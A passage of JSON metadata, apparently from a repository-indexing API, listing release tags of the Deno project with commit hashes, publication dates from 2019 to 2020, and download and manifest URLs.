/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v